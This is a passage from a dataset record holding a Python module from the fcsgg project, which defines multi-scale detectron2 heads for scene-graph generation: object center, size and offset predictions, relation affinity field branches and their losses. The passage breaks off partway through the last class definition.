hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
56d40bef780542eb88743c09c1fa854747fa3696
| 37,011
|
py
|
Python
|
fcsgg/modeling/heads/multiscale_head.py
|
liuhengyue/fcsgg
|
826c6e194270461a66ca5d048cb67f1ccf7ef387
|
[
"MIT"
] | 9
|
2022-01-17T03:27:46.000Z
|
2022-03-26T09:35:59.000Z
|
fcsgg/modeling/heads/multiscale_head.py
|
liuhengyue/fcsgg
|
826c6e194270461a66ca5d048cb67f1ccf7ef387
|
[
"MIT"
] | 3
|
2022-01-26T03:28:18.000Z
|
2022-02-03T04:19:29.000Z
|
fcsgg/modeling/heads/multiscale_head.py
|
liuhengyue/fcsgg
|
826c6e194270461a66ca5d048cb67f1ccf7ef387
|
[
"MIT"
] | null | null | null |
"""
Core implementations of detection heads in multi-scale.
"""
__author__ = "Hengyue Liu"
__copyright__ = "Copyright (c) 2021 Futurewei Inc."
__credits__ = [""]
__license__ = "MIT License"
__version__ = "0.1"
__maintainer__ = "Hengyue Liu"
__email__ = "onehothenry@gmail.com"
import logging
import numpy as np
from collections import defaultdict
from typing import Dict, List, Optional, Tuple, Union
import torch
from torch import nn
import torch.nn.functional as F
from detectron2.config import configurable
from detectron2.layers import ShapeSpec
from detectron2.structures import Boxes, ImageList, Instances, pairwise_iou
from detectron2.utils.events import get_event_storage
from detectron2.utils.registry import Registry
from detectron2.layers import cat, Conv2d, get_norm, CNNBlockBase
import fvcore.nn.weight_init as weight_init
from fcsgg.structures import SceneGraph
import fcsgg.utils.centernet_utils as centernet_utils
from detectron2.modeling.backbone.resnet import DeformBottleneckBlock
from .heads import *
from fcsgg.layers import MultiscaleFusionLayer, NONLocalBlock2D, NONLocalBlock3D, MultiscaleSum
from fcsgg.modeling.losses import RAFLoss
HEADS_REGISTRY.__doc__ = """
Registry for a multiscale-head in a single-stage model.
The registered object will be called with `obj(cfg, input_shape)`.
The call is expected to return an :class:`Head`.
"""
logger = logging.getLogger(__name__)
def interpolate_sum(features: List[torch.Tensor]):
out_features = features[0]
for i in range(1, len(features)):
out_features += F.interpolate(features[i], scale_factor=2 ** i, mode='bilinear', align_corners=True)
return out_features
@HEADS_REGISTRY.register()
class MultiScaleHeads(CenternetRelationHeads):
def __init__(self, cfg, input_shape):
super().__init__(cfg, input_shape)
# self.head = CenternetRelationHeads(cfg, input_shape)
# the strides to downsample the gt, [1, 2, 4, 8]
assert len(cfg.MODEL.HEADS.OUTPUT_STRIDES) == len(self.in_features), "number of features and strides mismatch."
self.strides = cfg.MODEL.HEADS.OUTPUT_STRIDES
def _forward(
self,
features: torch.Tensor,
targets: Optional[List[SceneGraph]] = None
) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
"""
features:
"""
losses, preds = super().forward(features, targets)
return losses, preds
def forward(
self,
features: Dict[str, torch.Tensor],
targets: Optional[List[SceneGraph]] = None
) -> Tuple[Dict[str, torch.Tensor], List[Dict[str, torch.Tensor]]]:
features = [features[f] for f in self.in_features]
preds, losses = [], {}
for i, features_per_scale in enumerate(features):
# form a SceneGraph
targets_per_scale = [target[i] for target in targets] if self.training else None
cur_stride = "_" + str(self.in_features[i])
loss, pred = self._forward(features_per_scale, targets_per_scale)
loss = {k + cur_stride: v for k, v in loss.items()}
losses.update(loss)
preds.append(pred)
return losses, preds
@HEADS_REGISTRY.register()
class MultiScaleSwitchNormHeads(SwitchNormHeads):
def __init__(self, cfg, input_shape):
super().__init__(cfg, input_shape)
assert len(cfg.MODEL.HEADS.OUTPUT_STRIDES) == len(self.in_features), "number of features and strides mismatch."
self.strides = cfg.MODEL.HEADS.OUTPUT_STRIDES
def _forward(
self,
features: Tuple[torch.Tensor, torch.Tensor],
targets: Optional[List[SceneGraph]] = None,
stride: int = 0
) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
"""
features:
"""
losses, preds = super().forward(features, targets, stride)
return losses, preds
def forward(
self,
features: Dict[str, torch.Tensor],
targets: Optional[List[SceneGraph]] = None
) -> Tuple[Dict[str, torch.Tensor], List[Dict[str, torch.Tensor]]]:
features = [features[f] for f in self.in_features]
preds, losses = [], {}
for i, features_per_scale in enumerate(features):
# form a SceneGraph
targets_per_scale = [target[i] for target in targets] if self.training else None
cur_stride = "_s" + str(self.strides[i])
loss, pred = self._forward(features_per_scale, targets_per_scale, self.strides[i])
loss = {k + cur_stride: v for k, v in loss.items()}
losses.update(loss)
preds.append(pred)
return losses, preds
@HEADS_REGISTRY.register()
class MultiScaleSwitchNormDAHeads(GeneralHeads):
def __init__(self, cfg, input_shape):
super().__init__(cfg, input_shape)
assert not self.single_scale
self.strides = cfg.MODEL.HEADS.OUTPUT_STRIDES
self.relation_on = cfg.RELATION.RELATION_ON
self.use_gt_label = cfg.RELATION.USE_GT_OBJECT_LABEL
self.use_non_local = cfg.MODEL.HEADS.RAF.NON_LOCAL
self.num_predicates = cfg.MODEL.HEADS.NUM_PREDICATES
self.raf_loss_weight = cfg.MODEL.HEADS.LOSS.RAF_WEIGHT
self.raf_dilation = cfg.MODEL.HEADS.RAF.DILATION
self.output_stride = self.output_strides[0]
self.fpn_num_branches = cfg.MODEL.FPN.NUM_BRANCHES
self.down_ratio = cfg.MODEL.HEADS.RAF.DOWN_SAMPLE_RATIO
self.num_levels = len(self.output_strides)
bn_momentum = cfg.MODEL.HEADS.BN_MOMENTUM
# the strides to downsample the gt, [1, 2, 4, 8]
assert len(cfg.MODEL.HEADS.OUTPUT_STRIDES) * self.fpn_num_branches == len(self.in_features), \
"number of features and strides mismatch."
deformable_on = cfg.MODEL.HEADS.RAF.LAST_DEFORM_ON
num_groups = cfg.MODEL.HEADS.RAF.NUM_GROUPS
width_per_group = cfg.MODEL.HEADS.RAF.WIDTH_PER_GROUP
bottleneck_channels = num_groups * width_per_group
conv_dim = cfg.MODEL.HEADS.CONV_DIM
num_conv = cfg.MODEL.HEADS.NUM_CONV
conv_norm = cfg.MODEL.HEADS.NORM
conv_dims = [conv_dim] * num_conv
raf_conv_dims = [cfg.MODEL.HEADS.RAF.CONV_DIM] * cfg.MODEL.HEADS.RAF.NUM_CONV
kernel_size = cfg.MODEL.HEADS.RAF.KERNEL_SIZE
in_channels = self.in_channels[0]
self.cls_head = MultiBNSingleHead(
in_channels,
self.num_classes,
self.output_stride,
conv_dims,
conv_norm=conv_norm,
bias_fill=True,
bias_value=self.cls_bias_value,
activation=torch.sigmoid_,
output_strides=self.output_strides,
bn_momentum=bn_momentum
)
self.wh_head = MultiBNSingleHead(in_channels, 2, self.output_stride,
conv_dims,
bias_fill=True,
conv_norm=conv_norm,
activation=None,
output_strides=self.output_strides,
bn_momentum=bn_momentum)
self.reg_head = MultiBNSingleHead(in_channels, 2, self.output_stride,
conv_dims,
conv_norm=conv_norm,
activation=None,
output_strides=self.output_strides,
bn_momentum=bn_momentum)
if self.relation_on:
self.raf_head = MultiBNSingleHead(in_channels,
2 * self.num_predicates,
self.output_stride,
raf_conv_dims,
kernel_size=kernel_size,
conv_norm=conv_norm,
bias_fill=True,
deformable_on=deformable_on,
dilation=self.raf_dilation,
bottleneck_channels=bottleneck_channels,
activation=None,
output_strides=self.output_strides,
down_ratio=self.down_ratio,
bn_momentum=bn_momentum
)
self.attn_layer = DA_Module(self.num_classes, self.num_predicates, down_ratio=self.down_ratio)
self.aggr_layer = MultiscaleSum(len(self.output_strides))
if self.training:
self.raf_loss_evaluator = RAFLoss(cfg)
def _forward_raf_branch(
self,
features: torch.Tensor,
obj_features: torch.Tensor,
targets: Optional[List[SceneGraph]] = None,
stride: int = 0
) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
"""
features: should be tuple of 2 elements, first for center, second for raf
"""
losses = {}
if self.training:
assert targets
rafs = self.raf_head(features, stride)
rafs = self.attn_layer(obj_features, rafs)
preds = {'raf': rafs}
if self.training:
loss_raf = self.raf_loss_evaluator(rafs, targets)
loss_raf *= self.raf_loss_weight
losses = {'loss_raf': loss_raf}
return losses, preds
def _forward_object_branch(
self,
features: torch.Tensor,
targets: Optional[List[SceneGraph]] = None,
stride: int = 0
) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
"""
features: center branch features from backbone (w/fpn)
"""
losses = {}
if self.training:
assert targets
cls = self.cls_head(features, stride)
wh = self.wh_head(features, stride)
reg = self.reg_head(features, stride)
preds = {
'cls': cls,
'wh': wh,
'reg': reg
}
if self.training:
losses.update(self.loss(preds, targets, after_activation=True))
return losses, preds
def forward(
self,
features: Dict[str, torch.Tensor],
targets: Optional[List[SceneGraph]] = None
) -> Tuple[Dict[str, torch.Tensor], List[Dict[str, torch.Tensor]]]:
features = [features[f] for f in self.in_features]
preds, losses = [], {}
if self.fpn_num_branches == 2:
# right now only support 2 branches
object_branch_features = features[:self.num_levels]
relation_branch_features = features[self.num_levels:]
else:
object_branch_features = features
relation_branch_features = features
center_preds = []
targets_all_scales = [[target[i] for target in targets] for i in range(len(self.output_strides))] \
if self.training else [None for _ in range(len(self.output_strides))]
# forward object branch first
for i, features_per_scale in enumerate(object_branch_features):
# form a SceneGraph
targets_per_scale = targets_all_scales[i]
cur_stride = "_s" + str(self.strides[i])
loss, pred = self._forward_object_branch(features_per_scale, targets_per_scale, self.strides[i])
loss = {k + cur_stride: v for k, v in loss.items()}
# if self.training or self.use_gt_label:
# ct_maps_per_scale = torch.stack([target.gt_ct_maps[i] for target in targets], dim=0)
# else:
# # pred['cls'] = torch.sigmoid(pred['cls'])
# ct_maps_per_scale = pred['cls'].detach()
ct_maps_per_scale = pred['cls'].detach()
losses.update(loss)
center_preds.append(ct_maps_per_scale)
preds.append(pred)
if self.relation_on:
center_features = self.aggr_layer(center_preds)
# then forward raf branch
for i, features_per_scale in enumerate(relation_branch_features):
# add non local block
# nonlocal_feat = self.non_local_attn(fused_center_feats[i])
# cat_feat = torch.cat((features_per_scale, nonlocal_feat), dim=1)
# if self.use_non_local:
# features_per_scale = self.non_local_attn(fused_center_feats[i], features_per_scale)
# else:
# simple concat
# features_per_scale = torch.cat((features_per_scale, center_preds[i]), dim=1)
targets_per_scale = targets_all_scales[i]
cur_stride = "_s" + str(self.strides[i])
loss, pred = self._forward_raf_branch(features_per_scale,
center_features[i],
targets_per_scale,
self.strides[i])
loss = {k + cur_stride: v for k, v in loss.items()}
losses.update(loss)
preds[i].update(pred)
return losses, preds
@HEADS_REGISTRY.register()
class MultiScaleSwitchNormConcatClassHeads(GeneralHeads):
def __init__(self, cfg, input_shape):
super().__init__(cfg, input_shape)
assert not self.single_scale
self.strides = cfg.MODEL.HEADS.OUTPUT_STRIDES
self.relation_on = cfg.RELATION.RELATION_ON
self.use_gt_label = cfg.RELATION.USE_GT_OBJECT_LABEL
self.use_non_local = cfg.MODEL.HEADS.RAF.NON_LOCAL
self.num_predicates = cfg.MODEL.HEADS.NUM_PREDICATES
self.raf_loss_weight = cfg.MODEL.HEADS.LOSS.RAF_WEIGHT
self.raf_dilation = cfg.MODEL.HEADS.RAF.DILATION
self.output_stride = self.output_strides[0]
self.fpn_num_branches = cfg.MODEL.FPN.NUM_BRANCHES
self.down_ratio = cfg.MODEL.HEADS.RAF.DOWN_SAMPLE_RATIO
split_pred = cfg.MODEL.HEADS.RAF.SPLIT
bn_momentum = cfg.MODEL.HEADS.BN_MOMENTUM
# the strides to downsample the gt, [1, 2, 4, 8]
assert len(cfg.MODEL.HEADS.OUTPUT_STRIDES) * self.fpn_num_branches == len(self.in_features), \
"number of features and strides mismatch."
deformable_on = cfg.MODEL.HEADS.RAF.LAST_DEFORM_ON
num_groups = cfg.MODEL.HEADS.RAF.NUM_GROUPS
width_per_group = cfg.MODEL.HEADS.RAF.WIDTH_PER_GROUP
bottleneck_channels = num_groups * width_per_group
conv_dim = cfg.MODEL.HEADS.CONV_DIM
num_conv = cfg.MODEL.HEADS.NUM_CONV
conv_norm = cfg.MODEL.HEADS.NORM
conv_dims = [conv_dim] * num_conv
raf_conv_dims = [cfg.MODEL.HEADS.RAF.CONV_DIM] * cfg.MODEL.HEADS.RAF.NUM_CONV
kernel_size = cfg.MODEL.HEADS.RAF.KERNEL_SIZE
in_channels = self.in_channels[0]
self.cls_head = MultiBNSingleHead(
in_channels,
self.num_classes,
self.output_stride,
conv_dims,
conv_norm=conv_norm,
bias_fill=True,
bias_value=self.cls_bias_value,
activation=torch.sigmoid_,
output_strides=self.output_strides,
bn_momentum=bn_momentum,
output_feat=True
)
self.wh_head = MultiBNSingleHead(in_channels, 2, self.output_stride,
conv_dims,
bias_fill=True,
conv_norm=conv_norm,
activation=None,
output_strides=self.output_strides,
bn_momentum=bn_momentum)
self.reg_head = MultiBNSingleHead(in_channels, 2, self.output_stride,
conv_dims,
conv_norm=conv_norm,
activation=None,
output_strides=self.output_strides,
bn_momentum=bn_momentum)
if self.relation_on:
self.raf_head = MultiBNSingleHead(in_channels + conv_dims[-1],
2 * self.num_predicates,
self.output_stride,
raf_conv_dims,
kernel_size=kernel_size,
conv_norm=conv_norm,
bias_fill=True,
deformable_on=deformable_on,
dilation=self.raf_dilation,
bottleneck_channels=bottleneck_channels,
activation=torch.tanh_,
output_strides=self.output_strides,
down_ratio=self.down_ratio,
up_ratio=1,
split_pred=split_pred
)
self.aggr_layer = MultiscaleSum(len(self.output_strides), aggr_method="sum")
if self.training:
self.raf_loss_evaluator = RAFLoss(cfg)
def _forward_raf_branch(
self,
features: torch.Tensor,
targets: Optional[List[SceneGraph]] = None,
stride: int = 0
) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
"""
features: should be tuple of 2 elements, first for center, second for raf
"""
losses = {}
if self.training:
assert targets
rafs = self.raf_head(features, stride)
preds = {'raf': rafs}
if self.training:
loss_raf = self.raf_loss_evaluator(rafs, targets)
loss_raf *= self.raf_loss_weight
losses = {'loss_raf': loss_raf}
return losses, preds
def _forward_object_branch(
self,
features: torch.Tensor,
targets: Optional[List[SceneGraph]] = None,
stride: int = 0
) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
"""
features: center branch features from backbone (w/fpn)
"""
losses = {}
if self.training:
assert targets
cls, obj_feat = self.cls_head(features, stride)
wh = self.wh_head(features, stride)
reg = self.reg_head(features, stride)
preds = {
'cls': cls,
'wh': wh,
'reg': reg,
'obj_feat': obj_feat
}
if self.training:
losses.update(self.loss(preds, targets, after_activation=True))
return losses, preds
def forward(
self,
features: Dict[str, torch.Tensor],
targets: Optional[List[SceneGraph]] = None
) -> Tuple[Dict[str, torch.Tensor], List[Dict[str, torch.Tensor]]]:
features = [features[f] for f in self.in_features]
preds, losses = [], {}
if self.fpn_num_branches == 2:
# right now only support 2 branches
object_branch_features = features[:len(self.output_strides)]
relation_branch_features = features[len(self.output_strides):]
else:
object_branch_features = features
relation_branch_features = features
center_preds = []
targets_all_scales = [[target[i] for target in targets] for i in range(len(self.output_strides))] \
if self.training else [None for _ in range(len(self.output_strides))]
# forward object branch first
for i, features_per_scale in enumerate(object_branch_features):
# form a SceneGraph
targets_per_scale = targets_all_scales[i]
cur_stride = "_s" + str(self.strides[i])
loss, pred = self._forward_object_branch(features_per_scale, targets_per_scale, self.strides[i])
loss = {k + cur_stride: v for k, v in loss.items()}
# if self.training or self.use_gt_label:
# ct_maps_per_scale = torch.stack([target.gt_ct_maps[i] for target in targets], dim=0)
# else:
ct_maps_per_scale = pred['obj_feat'].clone().detach()
losses.update(loss)
center_preds.append(ct_maps_per_scale)
preds.append(pred)
if self.relation_on:
center_features = self.aggr_layer(center_preds)
# then forward raf branch
for i, features_per_scale in enumerate(relation_branch_features):
features_per_scale = torch.cat((features_per_scale, center_features[i]), dim=1)
targets_per_scale = targets_all_scales[i]
cur_stride = "_s" + str(self.strides[i])
loss, pred = self._forward_raf_branch(features_per_scale, targets_per_scale, self.strides[i])
loss = {k + cur_stride: v for k, v in loss.items()}
losses.update(loss)
preds[i].update(pred)
return losses, preds
@HEADS_REGISTRY.register()
class MultiScaleSwitchNormDualHeads(DualBranchSwitchNormHeads):
def __init__(self, cfg, input_shape):
super().__init__(cfg, input_shape)
self.strides = cfg.MODEL.HEADS.OUTPUT_STRIDES
self.num_features_per_branch = len(self.strides)
# the strides to downsample the gt, [4, 8, ...]
assert self.num_features_per_branch * 2 == len(self.in_features), "number of features and strides mismatch."
def _forward(
self,
features: Tuple[torch.Tensor, torch.Tensor],
targets: Optional[List[SceneGraph]] = None,
stride: int = 0
) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
"""
features:
"""
losses, preds = super().forward(features, targets, stride)
return losses, preds
def forward(
self,
features: Dict[str, torch.Tensor],
targets: Optional[List[SceneGraph]] = None
) -> Tuple[Dict[str, torch.Tensor], List[Dict[str, torch.Tensor]]]:
features = [features[f] for f in self.in_features]
preds, losses = [], {}
for i, features_per_scale in enumerate(zip(features[:self.num_features_per_branch],
features[self.num_features_per_branch:])):
# form a SceneGraph
targets_per_scale = [target[i] for target in targets] if self.training else None
cur_stride = "_s" + str(self.strides[i])
loss, pred = self._forward(features_per_scale, targets_per_scale, self.strides[i])
loss = {k + cur_stride: v for k, v in loss.items()}
losses.update(loss)
preds.append(pred)
return losses, preds
@HEADS_REGISTRY.register()
class MultiScaleSwitchNormAttnHeads(GeneralHeads):
def __init__(self, cfg, input_shape):
super().__init__(cfg, input_shape)
assert not self.single_scale
self.strides = cfg.MODEL.HEADS.OUTPUT_STRIDES
self.relation_on = cfg.RELATION.RELATION_ON
self.use_gt_label = cfg.RELATION.USE_GT_OBJECT_LABEL
self.use_non_local = cfg.MODEL.HEADS.RAF.NON_LOCAL
self.num_predicates = cfg.MODEL.HEADS.NUM_PREDICATES
self.raf_loss_weight = cfg.MODEL.HEADS.LOSS.RAF_WEIGHT
self.raf_dilation = cfg.MODEL.HEADS.RAF.DILATION
self.output_stride = self.output_strides[0]
self.fpn_num_branches = cfg.MODEL.FPN.NUM_BRANCHES
self.down_ratio = cfg.MODEL.HEADS.RAF.DOWN_SAMPLE_RATIO
bn_momentum = cfg.MODEL.HEADS.BN_MOMENTUM
# the strides to downsample the gt, [1, 2, 4, 8]
assert len(cfg.MODEL.HEADS.OUTPUT_STRIDES) * self.fpn_num_branches == len( self.in_features), \
"number of features and strides mismatch."
deformable_on = cfg.MODEL.HEADS.RAF.LAST_DEFORM_ON
num_groups = cfg.MODEL.HEADS.RAF.NUM_GROUPS
width_per_group = cfg.MODEL.HEADS.RAF.WIDTH_PER_GROUP
bottleneck_channels = num_groups * width_per_group
conv_dim = cfg.MODEL.HEADS.CONV_DIM
num_conv = cfg.MODEL.HEADS.NUM_CONV
conv_norm = cfg.MODEL.HEADS.NORM
conv_dims = [conv_dim] * num_conv
raf_conv_dims = [cfg.MODEL.HEADS.RAF.CONV_DIM] * cfg.MODEL.HEADS.RAF.NUM_CONV
kernel_size = cfg.MODEL.HEADS.RAF.KERNEL_SIZE
in_channels = self.in_channels[0]
self.cls_head = MultiBNSingleHead(
in_channels,
self.num_classes,
self.output_stride,
conv_dims,
conv_norm=conv_norm,
bias_fill=True,
bias_value=self.cls_bias_value,
activation=None,
output_strides=self.output_strides,
bn_momentum=bn_momentum
)
self.wh_head = MultiBNSingleHead(in_channels, 2, self.output_stride,
conv_dims,
bias_fill=True,
conv_norm=conv_norm,
activation=None,
output_strides=self.output_strides,
bn_momentum=bn_momentum)
self.reg_head = MultiBNSingleHead(in_channels, 2, self.output_stride,
conv_dims,
conv_norm=conv_norm,
activation=None,
output_strides=self.output_strides,
bn_momentum=bn_momentum)
if self.relation_on:
self.raf_head = MultiBNSingleHead(in_channels + self.num_classes,
2 * self.num_predicates,
self.output_stride,
raf_conv_dims,
kernel_size=kernel_size,
conv_norm=conv_norm,
bias_fill=True,
deformable_on=deformable_on,
dilation=self.raf_dilation,
bottleneck_channels=bottleneck_channels,
activation=None,
output_strides=self.output_strides,
down_ratio=self.down_ratio
)
self.fuse_layer = MultiscaleFusionLayer(len(self.output_strides),
[self.num_classes] * len(self.output_strides),
multi_scale_output=True,
norm="SyncBN")
if self.training:
self.raf_loss_evaluator = RAFLoss(cfg)
# if self.use_non_local:
# self.non_local_attn = NONLocalBlock2D(self.num_classes,
# out_channels=in_channels,
# inter_channels=in_channels,
# norm=conv_norm,
# sub_sample=False,
# g_given=True)
def _forward_raf_branch(
self,
features: torch.Tensor,
targets: Optional[List[SceneGraph]] = None,
stride: int = 0
) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
"""
features: should be tuple of 2 elements, first for center, second for raf
"""
losses = {}
if self.training:
assert targets
rafs = self.raf_head(features, stride)
preds = {'raf': rafs}
if self.training:
loss_raf = self.raf_loss_evaluator(rafs, targets)
loss_raf *= self.raf_loss_weight
losses = {'loss_raf': loss_raf}
return losses, preds
def _forward_object_branch(
self,
features: torch.Tensor,
targets: Optional[List[SceneGraph]] = None,
stride: int = 0
) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
"""
features: center branch features from backbone (w/fpn)
"""
losses = {}
if self.training:
assert targets
cls = self.cls_head(features, stride)
wh = self.wh_head(features, stride)
reg = self.reg_head(features, stride)
preds = {
'cls': cls,
'wh': wh,
'reg': reg
}
if self.training:
losses.update(self.loss(preds, targets, after_activation=False))
return losses, preds
def forward(
self,
features: Dict[str, torch.Tensor],
targets: Optional[List[SceneGraph]] = None
) -> Tuple[Dict[str, torch.Tensor], List[Dict[str, torch.Tensor]]]:
features = [features[f] for f in self.in_features]
preds, losses = [], {}
if self.fpn_num_branches == 2:
# right now only support 2 branches
object_branch_features = features[:len(self.output_strides)]
relation_branch_features = features[len(self.output_strides):]
else:
object_branch_features = features
relation_branch_features = features
center_preds = []
targets_all_scales = [[target[i] for target in targets] for i in range(len(self.output_strides))] \
if self.training else [None for _ in range(len(self.output_strides))]
# forward object branch first
for i, features_per_scale in enumerate(object_branch_features):
# form a SceneGraph
targets_per_scale = targets_all_scales[i]
cur_stride = "_s" + str(self.strides[i])
loss, pred = self._forward_object_branch(features_per_scale, targets_per_scale, self.strides[i])
loss = {k + cur_stride: v for k, v in loss.items()}
# if self.training or self.use_gt_label:
# ct_maps_per_scale = torch.stack([target.gt_ct_maps[i] for target in targets], dim=0)
# else:
ct_maps_per_scale = pred['cls'].detach()
center_preds.append(ct_maps_per_scale)
losses.update(loss)
pred['cls'] = torch.sigmoid(pred['cls'])
preds.append(pred)
if self.relation_on:
# multi-scale center feature maps fusion
fused_center_feats = self.fuse_layer(center_preds)
# then forward raf branch
for i, features_per_scale in enumerate(relation_branch_features):
# add non local block
# nonlocal_feat = self.non_local_attn(fused_center_feats[i])
# cat_feat = torch.cat((features_per_scale, nonlocal_feat), dim=1)
# if self.use_non_local:
# features_per_scale = self.non_local_attn(fused_center_feats[i], features_per_scale)
# else:
# simple concat
features_per_scale = torch.cat((features_per_scale, fused_center_feats[i]), dim=1)
targets_per_scale = targets_all_scales[i]
cur_stride = "_s" + str(self.strides[i])
loss, pred = self._forward_raf_branch(features_per_scale, targets_per_scale, self.strides[i])
loss = {k + cur_stride: v for k, v in loss.items()}
losses.update(loss)
preds[i].update(pred)
return losses, preds
@HEADS_REGISTRY.register()
class MultiScaleDualHeads(DualBranchHeads):
def __init__(self, cfg, input_shape):
super().__init__(cfg, input_shape)
assert len(cfg.MODEL.HEADS.OUTPUT_STRIDES) * 2 == len(self.in_features), "number of features and strides mismatch."
self.strides = cfg.MODEL.HEADS.OUTPUT_STRIDES
def _forward(
self,
features: Tuple[torch.Tensor, torch.Tensor],
targets: Optional[List[SceneGraph]] = None
) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
"""
features:
"""
losses, preds = super().forward(features, targets)
return losses, preds
def forward(
self,
features: Dict[str, torch.Tensor],
targets: Optional[List[SceneGraph]] = None
) -> Tuple[Dict[str, torch.Tensor], List[Dict[str, torch.Tensor]]]:
features = [features[f] for f in self.in_features]
preds, losses = [], {}
for i, features_per_scale in enumerate(zip(features[:4], features[4:])):
# form a SceneGraph
targets_per_scale = [target[i] for target in targets] if self.training else None
cur_stride = "_s" + str(self.strides[i])
loss, pred = self._forward(features_per_scale, targets_per_scale)
loss = {k + cur_stride: v for k, v in loss.items()}
losses.update(loss)
preds.append(pred)
return losses, preds
@HEADS_REGISTRY.register()
class MultiStageHeads(CenternetRelationHeads):
def __init__(self, cfg, input_shape):
super().__init__(cfg, input_shape)
assert len(cfg.MODEL.HEADS.OUTPUT_STRIDES) == len(self.in_features), "number of features and strides mismatch."
self.strides = cfg.MODEL.HEADS.OUTPUT_STRIDES
self.out_names = ["_s" + str(stride) + "_{}".format(i) for i, stride in enumerate(self.strides)]
def _forward(
self,
features: torch.Tensor,
